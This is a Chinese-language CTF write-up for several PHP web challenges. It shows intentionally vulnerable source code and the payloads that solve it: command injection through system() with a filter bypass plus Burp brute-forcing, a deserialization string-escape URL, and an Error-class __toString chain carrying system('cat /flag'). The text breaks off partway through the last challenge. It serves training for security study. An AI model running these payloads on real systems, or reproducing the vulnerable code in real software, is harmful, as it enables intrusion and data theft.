<h2 id="h2-u6E90u7801"><a name="源码" class="reference-link"></a><span class="header-link octicon octicon-link"></span>源码</h2><pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="pun">&lt;?</span><span class="pln">php</span></code></li><li class="L1"><code class="lang-php"><span class="lit">@$str</span><span class="pln"> </span><span class="pun">=</span><span class="pln"> $_GET</span><span class="pun">[</span><span class="str">'f'</span><span class="pun">];</span></code></li><li class="L2"><code class="lang-php"><span class="lit">@$r</span><span class="pln"> </span><span class="pun">=</span><span class="pln"> $_GET</span><span class="pun">[</span><span class="str">'r'</span><span class="pun">];</span></code></li><li class="L3"><code class="lang-php"><span class="pln">$rand </span><span class="pun">=</span><span class="pln"> rand</span><span class="pun">(</span><span class="lit">1</span><span class="pun">,</span><span class="lit">50</span><span class="pun">);</span></code></li><li class="L4"><code class="lang-php"><span class="pln">var_dump</span><span class="pun">(</span><span class="pln">$rand</span><span class="pun">);</span></code></li><li class="L5"><code class="lang-php"><span class="pln">$isMatched </span><span class="pun">=</span><span class="pln"> preg_match_all</span><span class="pun">(</span><span class="str">'/\$_GET|\$_POST|\$_REQUEST|file_put_contents|file_get_contents|type|dir/i'</span><span class="pun">,</span><span class="pln"> $str</span><span class="pun">);</span></code></li><li class="L6"><code class="lang-php"><span class="kwd">if</span><span class="pun">(</span><span class="pln">$isMatched </span><span class="pun">!=</span><span class="pln"> </span><span class="lit">0</span><span class="pun">){</span></code></li><li class="L7"><code class="lang-php"><span class="pln">    </span><span class="kwd">die</span><span class="pun">(</span><span class="str">'bad hacker!'</span><span class="pun">);</span></code></li><li class="L8"><code class="lang-php"><span class="pun">}</span></code></li><li class="L9"><code class="lang-php"><span class="kwd">if</span><span class="pun">(</span><span class="pln">$r </span><span class="pun">==</span><span class="pln"> $rand</span><span class="pun">){</span></code></li><li class="L0"><code class="lang-php"><span class="pln">    echo </span><span class="str">'GO!&lt;br&gt;'</span><span class="pun">;</span></code></li><li class="L1"><code class="lang-php"><span class="pln">    system</span><span class="pun">(</span><span class="pln">$str</span><span class="pun">);</span></code></li><li class="L2"><code class="lang-php"><span class="pun">}</span></code></li><li class="L3"><code class="lang-php"><span class="pun">?&gt;</span></code></li></ol></pre>
<p><strong>可以看到源码中有system()命令执行，但是正则过滤了部分命令</strong></p>
<p><strong>这里可以使用copy命令</strong></p>
<p><strong>将flag.php 复制到一个txt文件中，直接读取txt文件即可获得flag</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-cmd"><span class="pln">copy flag</span><span class="pun">.</span><span class="pln">php </span><span class="lit">1.txt</span></code></li></ol></pre>
<p><strong>要执行system需要满足</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="kwd">if</span><span class="pun">(</span><span class="pln">$r </span><span class="pun">==</span><span class="pln"> $rand</span><span class="pun">)</span></code></li></ol></pre>
<p>我们传入r的参数需要和随机数$rand相同</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="pln">$rand </span><span class="pun">=</span><span class="pln"> rand</span><span class="pun">(</span><span class="lit">1</span><span class="pun">,</span><span class="lit">50</span><span class="pun">);</span></code></li><li class="L1"><code class="lang-php"></code></li><li class="L2"><code class="lang-php"><span class="pun">生成</span><span class="lit">1</span><span class="pun">-</span><span class="lit">50</span><span class="pun">的随机数</span></code></li></ol></pre>
<p>这里使用burp抓包进行爆破随机数</p>
<p><strong>构造payload:</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">index</span><span class="pun">.</span><span class="pln">php</span><span class="pun">?</span><span class="pln">f</span><span class="pun">=</span><span class="pln">copy flag</span><span class="pun">.</span><span class="pln">php </span><span class="lit">1.txt</span><span class="pun">&amp;</span><span class="pln">r</span><span class="pun">=</span><span class="lit">1</span></code></li></ol></pre><p><strong>抓包后进行payload设置</strong></p>
<p><img src="https://nc0.cdn.zkaq.cn/md/5597/517b7e5b30f3c1abdccb99c046c36f33_88831.png" alt=""></p>
<p><img src="https://nc0.cdn.zkaq.cn/md/5597/c4aa0caba56a37b08590f76728891afc_47763.png" alt=""></p>
<p><strong>跑包结束，进行排序</strong></p>
<p><img src="https://nc0.cdn.zkaq.cn/md/5597/49fcd862196eba2fbbca09a06c7f3ba8_51068.png" alt=""></p>
<p><strong>访问/1.txt即可获得flag</strong><br><img src="https://nc0.cdn.zkaq.cn/md/5597/a1fa379de33ed8c273fe9cfa60194204_24374.png" alt=""></p>
<h2 id="h2-ctf-107"><a name="CTF-107" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-107</h2><h3 id="h3-u6E90u7801"><a name="源码" class="reference-link"></a><span class="header-link octicon octicon-link"></span>源码</h3><pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="pun">&lt;?</span><span class="pln">php</span></code></li><li class="L1"><code class="lang-php"><span class="pln">include </span><span class="str">'flag.php'</span><span class="pun">;</span></code></li><li class="L2"><code class="lang-php"><span class="pln">highlight_file</span><span class="pun">(</span><span class="pln"> __FILE__</span><span class="pun">);</span></code></li><li class="L3"><code class="lang-php"><span class="kwd">function</span><span class="pln"> filter</span><span class="pun">(</span><span class="pln">$string</span><span class="pun">){</span></code></li><li class="L4"><code class="lang-php"><span class="pln">    $filter </span><span class="pun">=</span><span class="pln"> </span><span class="str">'/flag/i'</span><span class="pun">;</span></code></li><li class="L5"><code class="lang-php"><span class="pln">    </span><span class="kwd">return</span><span class="pln"> preg_replace</span><span class="pun">(</span><span class="pln">$filter</span><span class="pun">,</span><span class="str">'flagcc'</span><span class="pun">,</span><span class="pln">$string</span><span class="pun">);</span></code></li><li class="L6"><code class="lang-php"><span class="pun">}</span></code></li><li class="L7"><code class="lang-php"><span class="pln">$username</span><span class="pun">=</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'name'</span><span class="pun">];</span></code></li><li class="L8"><code class="lang-php"><span class="pln">$pass</span><span class="pun">=</span><span class="str">"V13tN4m_number_one"</span><span class="pun">;</span></code></li><li class="L9"><code class="lang-php"><span class="pln">$pass</span><span class="pun">=</span><span class="str">"Fl4g_in_V13tN4m"</span><span class="pun">;</span></code></li><li class="L0"><code class="lang-php"><span class="pln">$ser</span><span class="pun">=</span><span class="str">'a:2:{i:0;s:'</span><span class="pun">.</span><span class="pln">strlen</span><span class="pun">(</span><span class="pln">$username</span><span class="pun">).</span><span class="str">":\"$username\";i:1;s:"</span><span class="pun">.</span><span class="pln">strlen</span><span class="pun">(</span><span class="pln">$pass</span><span class="pun">).</span><span class="str">":\"$pass\";}"</span><span class="pun">;</span></code></li><li class="L1"><code class="lang-php"></code></li><li class="L2"><code class="lang-php"><span class="pln">$authen </span><span class="pun">=</span><span class="pln"> unserialize</span><span class="pun">(</span><span class="pln">filter</span><span class="pun">(</span><span class="pln">$ser</span><span class="pun">));</span></code></li><li class="L3"><code class="lang-php"></code></li><li class="L4"><code class="lang-php"><span class="kwd">if</span><span class="pun">(</span><span class="pln">$authen</span><span class="pun">[</span><span class="lit">1</span><span class="pun">]===</span><span class="str">"V13tN4m_number_one "</span><span class="pun">){</span></code></li><li class="L5"><code class="lang-php"><span class="pln">    echo $flag</span><span class="pun">;</span></code></li><li class="L6"><code class="lang-php"><span class="pun">}</span></code></li><li class="L7"><code class="lang-php"><span class="kwd">if</span><span class="pln"> </span><span class="pun">(!</span><span class="pln">isset</span><span class="pun">(</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'debug'</span><span class="pun">]))</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L8"><code class="lang-php"><span class="pln">    echo</span><span class="pun">(</span><span class="str">"PLSSS DONT HACK ME!!!!!!"</span><span class="pun">).</span><span class="pln">PHP_EOL</span><span class="pun">;</span></code></li><li class="L9"><code class="lang-php"><span class="pun">}</span><span class="pln"> </span><span class="kwd">else</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L0"><code class="lang-php"><span class="pln">    highlight_file</span><span class="pun">(</span><span class="pln"> __FILE__</span><span class="pun">);</span></code></li><li class="L1"><code class="lang-php"><span class="pun">}</span></code></li><li class="L2"><code class="lang-php"><span class="pun">?&gt;</span></code></li><li class="L3"><code class="lang-php"><span class="com">&lt;!-- debug --&gt;</span></code></li></ol></pre>
<p><strong>变长的反序列化逃逸</strong></p>
<h3 id="h3-payload"><a name="payload" class="reference-link"></a><span class="header-link octicon octicon-link"></span>payload</h3><pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">index</span><span class="pun">.</span><span class="pln">php</span><span class="pun">/?</span><span class="pln">debug</span><span class="pun">&amp;</span><span class="pln">name</span><span class="pun">=</span><span class="pln">flagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflag</span><span class="str">";i:1;s:19:"</span><span class="pln">V13tN4m_number_one </span><span class="str">";}</span></code></li></ol></pre><h2 id="h2-ctf-108"><a name="CTF-108" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-108</h2><h3 id="h3-u6E90u7801"><a name="源码" class="reference-link"></a><span class="header-link octicon octicon-link"></span>源码</h3><pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="dec">&lt;!doctype html&gt;</span></code></li><li class="L1"><code class="lang-php"><span class="tag">&lt;html&gt;</span></code></li><li class="L2"><code class="lang-php"><span class="tag">&lt;head&gt;</span></code></li><li class="L3"><code class="lang-php"><span class="tag">&lt;meta</span><span class="pln"> </span><span class="atn">charset</span><span class="pun">=</span><span class="atv">"utf-8"</span><span class="tag">&gt;</span></code></li><li class="L4"><code class="lang-php"><span class="tag">&lt;meta</span><span class="pln"> </span><span class="atn">http-equiv</span><span class="pun">=</span><span class="atv">"X-UA-Compatible"</span><span class="pln"> </span><span class="atn">content</span><span class="pun">=</span><span class="atv">"IE=edge"</span><span class="tag">&gt;</span></code></li><li class="L5"><code class="lang-php"><span class="tag">&lt;meta</span><span class="pln"> </span><span class="atn">name</span><span class="pun">=</span><span class="atv">"viewport"</span><span class="pln"> </span><span class="atn">content</span><span class="pun">=</span><span class="atv">"width=device-width, initial-scale=1"</span><span class="tag">&gt;</span></code></li><li class="L6"><code class="lang-php"><span class="tag">&lt;link</span><span class="pln"> </span><span class="atn">rel</span><span class="pun">=</span><span class="atv">"stylesheet"</span><span class="pln"> </span><span class="atn">href</span><span class="pun">=</span><span class="atv">"css.css"</span><span class="tag">&gt;</span></code></li><li class="L7"><code class="lang-php"><span class="tag">&lt;title&gt;</span><span class="pln">空白页面</span><span class="tag">&lt;/title&gt;</span></code></li><li class="L8"><code class="lang-php"><span class="tag">&lt;/head&gt;</span></code></li><li class="L9"><code class="lang-php"><span class="tag">&lt;div</span><span class="pln"> </span><span class="atn">class</span><span class="pun">=</span><span class="atv">"overlay"</span><span class="tag">&gt;</span></code></li><li class="L0"><code class="lang-php"><span class="pln">    </span><span class="tag">&lt;div</span><span class="pln"> </span><span class="atn">class</span><span class="pun">=</span><span class="atv">"hero"</span><span class="tag">&gt;</span></code></li><li class="L1"><code class="lang-php"><span class="pln">        </span><span class="tag">&lt;h1&gt;</span><span class="pln">这是一个</span><span class="tag">&lt;span&gt;</span><span class="pln">空白页面</span><span class="tag">&lt;/span&gt;&lt;/h1&gt;</span></code></li><li class="L2"><code class="lang-php"><span class="pln">        </span><span class="tag">&lt;h3&gt;</span><span class="pln">别找了小hacker, 这里什么都没有</span><span class="tag">&lt;/h3&gt;</span></code></li><li class="L3"><code class="lang-php"><span class="pln">        </span><span class="tag">&lt;h3&gt;</span><span class="pln">p   我是传参名-------------10086：看看我</span><span class="tag">&lt;/h3&gt;</span></code></li><li class="L4"><code class="lang-php"><span class="pln">    </span><span class="tag">&lt;/div&gt;</span></code></li><li class="L5"><code class="lang-php"><span class="tag">&lt;/div&gt;</span></code></li><li class="L6"><code class="lang-php"><span class="tag">&lt;/html&gt;</span></code></li><li class="L7"><code class="lang-php"><span class="pun">&lt;?</span><span class="pln">php</span></code></li><li class="L8"><code class="lang-php"><span class="pln">error_reporting</span><span class="pun">(</span><span class="lit">0</span><span class="pun">);</span></code></li><li class="L9"><code class="lang-php"><span class="pln">$p </span><span class="pun">=</span><span class="pln"> $_GET</span><span class="pun">[</span><span class="str">"p"</span><span class="pun">];</span></code></li><li class="L0"><code class="lang-php"></code></li><li class="L1"><code class="lang-php"><span class="pln">    </span><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span><span class="pln">isset</span><span class="pun">(</span><span class="pln">$p</span><span class="pun">))</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L2"><code class="lang-php"><span class="pln">        echo </span><span class="str">'恭喜你获得了flag!，去访问flag.txt吧'</span><span class="pun">;</span></code></li><li class="L3"><code class="lang-php"><span class="pln">        $i </span><span class="pun">=</span><span class="pln"> </span><span class="lit">1</span><span class="pun">;</span></code></li><li class="L4"><code class="lang-php"><span class="pln">        </span><span class="kwd">while</span><span class="pun">(</span><span class="pln">$i </span><span class="pun">!=</span><span class="pln"> </span><span class="lit">100</span><span class="pun">){</span></code></li><li class="L5"><code class="lang-php"><span class="pln">            file_put_contents</span><span class="pun">(</span><span class="str">'flag/flag'</span><span class="pun">.</span><span class="pln">$i</span><span class="pun">.</span><span class="str">'.txt'</span><span class="pun">,</span><span class="str">'访问下一个吧！flag'</span><span class="pun">.(</span><span class="pln">$i</span><span class="pun">+</span><span class="lit">1</span><span class="pun">).</span><span class="str">'.txt'</span><span class="pun">);</span></code></li><li class="L6"><code class="lang-php"><span class="pln">            $i </span><span class="pun">=</span><span class="pln"> $i</span><span class="pun">+</span><span class="lit">1</span><span class="pun">;</span></code></li><li class="L7"><code class="lang-php"><span class="pln">        </span><span class="pun">}</span></code></li><li class="L8"><code class="lang-php"><span class="pln">        file_put_contents</span><span class="pun">(</span><span class="str">'flag/flag10086.txt'</span><span class="pun">,</span><span class="str">'flag{FORFIVEASJDLAJSLQWEOIAS}'</span><span class="pun">);</span></code></li><li class="L9"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span><span class="pln"> </span><span class="kwd">else</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L0"><code class="lang-php"><span class="pln">        echo </span><span class="str">"NONONO"</span><span class="pun">;</span></code></li><li class="L1"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L2"><code class="lang-php"><span class="pun">?&gt;</span></code></li></ol></pre>
<p><strong>对p任意传参，生成了102个flag.txt<br>正确的flag在flag10086.txt里面</strong></p>
<p><strong>访问<code>flag/flag10086.txt</code></strong></p>
<h2 id="h2-ctf-109"><a name="CTF-109" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-109</h2><h2 id="h2-u6E90u7801"><a name="源码" class="reference-link"></a><span class="header-link octicon octicon-link"></span>源码</h2><pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="tag">&lt;meta</span><span class="pln"> </span><span class="atn">charset</span><span class="pun">=</span><span class="atv">"utf-8"</span><span class="pln"> </span><span class="tag">/&gt;</span></code></li><li class="L1"><code class="lang-php"><span class="tag">&lt;h3&gt;</span><span class="pln">Jack Love Rose</span><span class="tag">&lt;h3/&gt;</span></code></li><li class="L2"><code class="lang-php"><span class="tag">&lt;h3&gt;</span><span class="pln">此题有一定难度，有关反序列化</span><span class="tag">&lt;h3/&gt;</span></code></li><li class="L3"><code class="lang-php"><span class="pun">&lt;?</span><span class="pln">php</span></code></li><li class="L4"><code class="lang-php"><span class="pln">highlight_file</span><span class="pun">(</span><span class="pln">__file__</span><span class="pun">);</span></code></li><li class="L5"><code class="lang-php"></code></li><li class="L6"><code class="lang-php"><span class="kwd">class</span><span class="pln"> </span><span class="typ">Jack</span></code></li><li class="L7"><code class="lang-php"><span class="pun">{</span></code></li><li class="L8"><code class="lang-php"><span class="pln">    </span><span class="kwd">private</span><span class="pln"> $action</span><span class="pun">;</span></code></li><li class="L9"><code class="lang-php"></code></li><li class="L0"><code class="lang-php"><span class="pln">    </span><span class="kwd">function</span><span class="pln"> __set</span><span class="pun">(</span><span class="pln">$a</span><span class="pun">,</span><span class="pln"> $b</span><span class="pun">)</span></code></li><li class="L1"><code class="lang-php"><span class="pln">    </span><span class="pun">{</span></code></li><li class="L2"><code class="lang-php"><span class="pln">        $b</span><span class="pun">-&gt;</span><span class="pln">$a</span><span class="pun">();</span></code></li><li class="L3"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L4"><code class="lang-php"><span class="pun">}</span></code></li><li class="L5"><code class="lang-php"><span class="kwd">class</span><span class="pln"> </span><span class="typ">Love</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L6"><code class="lang-php"><span class="pln">    </span><span class="kwd">public</span><span class="pln"> $var</span><span class="pun">;</span></code></li><li class="L7"><code class="lang-php"><span class="pln">    </span><span class="kwd">function</span><span class="pln"> __call</span><span class="pun">(</span><span class="pln">$a</span><span class="pun">,</span><span class="pln">$b</span><span class="pun">)</span></code></li><li class="L8"><code class="lang-php"><span class="pln">    </span><span class="pun">{</span></code></li><li class="L9"><code class="lang-php"><span class="pln">        $rose </span><span class="pun">=</span><span class="pln"> $this</span><span class="pun">-&gt;</span><span class="kwd">var</span><span class="pun">;</span></code></li><li class="L0"><code class="lang-php"><span class="pln">        call_user_func</span><span class="pun">(</span><span class="pln">$rose</span><span class="pun">);</span></code></li><li class="L1"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L2"><code class="lang-php"><span class="pln">    </span><span class="kwd">private</span><span class="pln"> </span><span class="kwd">function</span><span class="pln"> action</span><span class="pun">(){</span></code></li><li class="L3"><code class="lang-php"><span class="pln">        echo </span><span class="str">"jack love rose"</span><span class="pun">;</span></code></li><li class="L4"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L5"><code class="lang-php"><span class="pun">}</span></code></li><li class="L6"><code class="lang-php"><span class="kwd">class</span><span class="pln"> </span><span class="typ">Titanic</span><span class="pun">{</span></code></li><li class="L7"><code class="lang-php"><span class="pln">    </span><span class="kwd">public</span><span class="pln"> $people</span><span class="pun">;</span></code></li><li class="L8"><code class="lang-php"><span class="pln">    </span><span class="kwd">public</span><span class="pln"> $ship</span><span class="pun">;</span></code></li><li class="L9"><code class="lang-php"><span class="pln">    </span><span class="kwd">function</span><span class="pln"> __destruct</span><span class="pun">(){</span></code></li><li class="L0"><code class="lang-php"><span class="pln">        $this</span><span class="pun">-&gt;</span><span class="pln">people</span><span class="pun">-&gt;</span><span class="pln">action</span><span class="pun">=</span><span class="pln">$this</span><span class="pun">-&gt;</span><span class="pln">ship</span><span class="pun">;</span></code></li><li class="L1"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L2"><code class="lang-php"><span class="pun">}</span></code></li><li class="L3"><code class="lang-php"><span class="kwd">class</span><span class="pln"> </span><span class="typ">Rose</span><span class="pun">{</span></code></li><li class="L4"><code class="lang-php"><span class="pln">    </span><span class="kwd">public</span><span class="pln"> $var1</span><span class="pun">;</span></code></li><li class="L5"><code class="lang-php"><span class="pln">    </span><span class="kwd">public</span><span class="pln"> $var2</span><span class="pun">;</span></code></li><li class="L6"><code class="lang-php"><span class="pln">    </span><span class="kwd">function</span><span class="pln"> __invoke</span><span class="pun">(){</span></code></li><li class="L7"><code class="lang-php"><span class="pln">        </span><span class="kwd">if</span><span class="pun">(</span><span class="pln"> </span><span class="pun">(</span><span class="pln">$this</span><span class="pun">-&gt;</span><span class="pln">var1 </span><span class="pun">!=</span><span class="pln"> $this</span><span class="pun">-&gt;</span><span class="pln">var2</span><span class="pun">)</span><span class="pln"> </span><span class="pun">&amp;&amp;</span><span class="pln"> </span><span class="pun">(</span><span class="pln">md5</span><span class="pun">(</span><span class="pln">$this</span><span class="pun">-&gt;</span><span class="pln">var1</span><span class="pun">)</span><span class="pln"> </span><span class="pun">===</span><span class="pln"> md5</span><span class="pun">(</span><span class="pln">$this</span><span class="pun">-&gt;</span><span class="pln">var2</span><span class="pun">))</span><span class="pln"> </span><span class="pun">&amp;&amp;</span><span class="pln"> </span><span class="pun">(</span><span class="pln">sha1</span><span class="pun">(</span><span class="pln">$this</span><span class="pun">-&gt;</span><span class="pln">var1</span><span class="pun">)===</span><span class="pln"> sha1</span><span class="pun">(</span><span class="pln">$this</span><span class="pun">-&gt;</span><span class="pln">var2</span><span class="pun">))</span><span class="pln"> </span><span class="pun">){</span></code></li><li class="L8"><code class="lang-php"><span class="pln">            </span><span class="kwd">eval</span><span class="pun">(</span><span class="pln">$this</span><span class="pun">-&gt;</span><span class="pln">var1</span><span class="pun">);</span></code></li><li class="L9"><code class="lang-php"><span class="pln">        </span><span class="pun">}</span></code></li><li class="L0"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L1"><code class="lang-php"><span class="pun">}</span></code></li><li class="L2"><code class="lang-php"><span class="kwd">if</span><span class="pun">(</span><span class="pln">isset</span><span class="pun">(</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'love'</span><span class="pun">])){</span></code></li><li class="L3"><code class="lang-php"><span class="pln">    $sail</span><span class="pun">=</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'love'</span><span class="pun">];</span></code></li><li class="L4"><code class="lang-php"><span class="pln">    unserialize</span><span class="pun">(</span><span class="pln">$sail</span><span class="pun">);</span></code></li><li class="L5"><code class="lang-php"><span class="pun">}</span></code></li><li class="L6"><code class="lang-php"><span class="pun">?&gt;</span></code></li></ol></pre>
<p>题目所涉及到的魔术方法：</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">PHP</span></code></li><li class="L1"><code><span class="pln">__call</span><span class="pun">()</span><span class="pln">   </span><span class="com">// 在对象上下文中调用不可访问的方法时触发</span></code></li><li class="L2"><code><span class="pln">__set</span><span class="pun">()</span><span class="pln">   </span><span class="com">// 用于将数据写入不可访问的属性</span></code></li><li class="L3"><code><span class="pln">__invoke</span><span class="pun">()</span><span class="pln">   </span><span class="com">//当尝试将对象调用为函数时触发</span></code></li></ol></pre><p>首先看到 Rose 类中有一个 eval 函数可以执行任意代码，但是需要绕过：</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">PHP</span></code></li><li class="L1"><code><span class="kwd">if</span><span class="pun">(</span><span class="pln"> </span><span class="pun">(</span><span class="pln">$this</span><span class="pun">-&gt;</span><span class="pln">var1 </span><span class="pun">!=</span><span class="pln"> $this</span><span class="pun">-&gt;</span><span class="pln">var2</span><span class="pun">)</span><span class="pln"> </span><span class="pun">&amp;&amp;</span><span class="pln"> </span><span class="pun">(</span><span class="pln">md5</span><span class="pun">(</span><span class="pln">$this</span><span class="pun">-&gt;</span><span class="pln">var1</span><span class="pun">)</span><span class="pln"> </span><span class="pun">===</span><span class="pln"> md5</span><span class="pun">(</span><span class="pln">$this</span><span class="pun">-&gt;</span><span class="pln">var2</span><span class="pun">))</span><span class="pln"> </span><span class="pun">&amp;&amp;</span><span class="pln"> </span><span class="pun">(</span><span class="pln">sha1</span><span class="pun">(</span><span class="pln">$this</span><span class="pun">-&gt;</span><span class="pln">var1</span><span class="pun">)===</span><span class="pln"> sha1</span><span class="pun">(</span><span class="pln">$this</span><span class="pun">-&gt;</span><span class="pln">var2</span><span class="pun">))</span><span class="pln"> </span><span class="pun">)</span></code></li></ol></pre><p>这个乍看一眼在 CTF 的基础题目中非常常见，一般情况下只需要使用数组即可绕过。但是这里是在类里面，我们当然不能这么做。</p>
<p>这里的考点是 md5() 和 sha1() 可以对一个类进行hash，并且会触发这个类的 <code>__toString</code> 方法；且当eval()函数传入一个类对象时，也会触发这个类里的 <code>__toString</code> 方法。</p>
<p>所以我们可以使用含有 <code>__toString</code> 方法的PHP内置类来绕过，用的两个比较多的内置类就是 <code>Exception</code> 和 <code>Error</code> ，他们之中有一个 <code>__toString</code> 方法，当类被当做字符串处理时，就会调用这个函数。</p>
<p>这里以<code>Error</code> 类为例，我们来看看当触发他的 <code>__toString</code> 方法时会发生什么：</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">PHP</span></code></li><li class="L1"><code><span class="pun">&lt;?</span><span class="pln">php</span></code></li><li class="L2"><code><span class="pln">$a </span><span class="pun">=</span><span class="pln"> </span><span class="kwd">new</span><span class="pln"> </span><span class="typ">Error</span><span class="pun">(</span><span class="str">"payload"</span><span class="pun">,</span><span class="lit">1</span><span class="pun">);</span></code></li><li class="L3"><code><span class="pln">echo $a</span><span class="pun">;</span></code></li></ol></pre><p>输出如下：</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">PHP</span></code></li><li class="L1"><code><span class="typ">Error</span><span class="pun">:</span><span class="pln"> payload </span><span class="kwd">in</span><span class="pln"> </span><span class="pun">/</span><span class="pln">usercode</span><span class="pun">/</span><span class="pln">file</span><span class="pun">.</span><span class="pln">php</span><span class="pun">:</span><span class="lit">2</span></code></li><li class="L2"><code><span class="typ">Stack</span><span class="pln"> trace</span><span class="pun">:</span></code></li><li class="L3"><code><span class="com">#0 {main}</span></code></li></ol></pre><p>发现会以字符串的形式输出当前报错，包含当前的错误信息（payload）以及当前报错的行号（2），而传入 <code>Error("payload",1)</code> 中的错误代码“1”则没有输出出来。</p>
<p>在来看看下一个例子：</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">PHP</span></code></li><li class="L1"><code><span class="pun">&lt;?</span><span class="pln">php</span></code></li><li class="L2"><code><span class="pln">$a </span><span class="pun">=</span><span class="pln"> </span><span class="kwd">new</span><span class="pln"> </span><span class="typ">Error</span><span class="pun">(</span><span class="str">"payload"</span><span class="pun">,</span><span class="lit">1</span><span class="pun">);</span><span class="pln">$b </span><span class="pun">=</span><span class="pln"> </span><span class="kwd">new</span><span class="pln"> </span><span class="typ">Error</span><span class="pun">(</span><span class="str">"payload"</span><span class="pun">,</span><span class="lit">2</span><span class="pun">);</span></code></li><li class="L3"><code><span class="pln">echo $a</span><span class="pun">;</span></code></li><li class="L4"><code><span class="pln">echo </span><span class="str">"\r\n\r\n"</span><span class="pun">;</span></code></li><li class="L5"><code><span class="pln">echo $b</span><span class="pun">;</span></code></li></ol></pre><p>输出如下：</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">PHP</span></code></li><li class="L1"><code><span class="typ">Error</span><span class="pun">:</span><span class="pln"> payload </span><span class="kwd">in</span><span class="pln"> </span><span class="pun">/</span><span class="pln">usercode</span><span class="pun">/</span><span class="pln">file</span><span class="pun">.</span><span class="pln">php</span><span class="pun">:</span><span class="lit">2</span></code></li><li class="L2"><code><span class="typ">Stack</span><span class="pln"> trace</span><span class="pun">:</span></code></li><li class="L3"><code><span class="com">#0 {main}</span></code></li><li class="L4"><code><span class="typ">Error</span><span class="pun">:</span><span class="pln"> payload </span><span class="kwd">in</span><span class="pln"> </span><span class="pun">/</span><span class="pln">usercode</span><span class="pun">/</span><span class="pln">file</span><span class="pun">.</span><span class="pln">php</span><span class="pun">:</span><span class="lit">2</span></code></li><li class="L5"><code><span class="typ">Stack</span><span class="pln"> trace</span><span class="pun">:</span></code></li><li class="L6"><code><span class="com">#0 {main}</span></code></li></ol></pre><p>可见，<code>$a</code> 和 <code>$b</code> 这两个对象本身是不同的，但是 <code>__toString</code> 方法返回的结果是相同的。注意，这里之所以需要在同一行是因为 <code>__toString</code> 返回的数据包含当前行号。</p>
<p><code>Exception</code> 类与 <code>Error</code> 的使用和结果完全一样，只不过 <code>Exception</code> 类适用于PHP 5和7，而 <code>Error</code> 只适用于 PHP 7。</p>
<p>那么我们的思路就来了，我们可以将题目代码中的 <code>$syc</code> 和 <code>$lover</code> 分别声明为类似上面的内置类的对象，让这两个对象本身不同（传入的错误代码即可），但是 <code>__toString</code> 方法输出的结果相同即可。所以绕过这一步分的 Payload 大致如下：</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">PHP</span></code></li><li class="L1"><code><span class="pln">$payload </span><span class="pun">=</span><span class="pln"> </span><span class="str">"?&gt;&lt;?=system('cat /flag')?&gt;"</span><span class="pun">;</span></code></li><li class="L2"><code><span class="pln">$a</span><span class="pun">=</span><span class="kwd">new</span><span class="pln"> </span><span class="typ">Error</span><span class="pun">(</span><span class="pln">$payload</span><span class="pun">,</span><span class="lit">1</span><span class="pun">);</span><span class="pln">$b</span><span class="pun">=</span><span class="kwd">new</span><span class="pln"> </span><span class="typ">Error</span><span class="pun">(</span><span class="pln">$payload</span><span class="pun">,</span><span class="lit">2</span><span class="pun">);</span></code></li><li class="L3"><code><span class="pln">$eval </span><span class="pun">=</span><span class="pln"> </span><span class="kwd">new</span><span class="pln"> </span><span class="typ">Rose</span><span class="pun">();</span></code></li><li class="L4"><code><span class="pln">$eval </span><span class="pun">-&gt;</span><span class="pln"> var1 </span><span class="pun">=</span><span class="pln"> $a</span><span class="pun">;</span></code></li><li class="L5"><code><span class="pln">$eval </span><span class="pun">-&gt;</span><span class="pln"> var2 </span><span class="pun">=</span><span class="pln"> $b</span><span class="pun">;</span></code></li></ol></pre><p>接下来我们解决的便是如何调用 Rose 类中的 <code>__invoke</code> 方法来执行 eval 了。在 Love 类的 <code>__call</code> 方法中有一个 call_user_func 函数，我们可以通过这个函数来触发 Rose 类中的 <code>__invoke</code> 方法。</p>
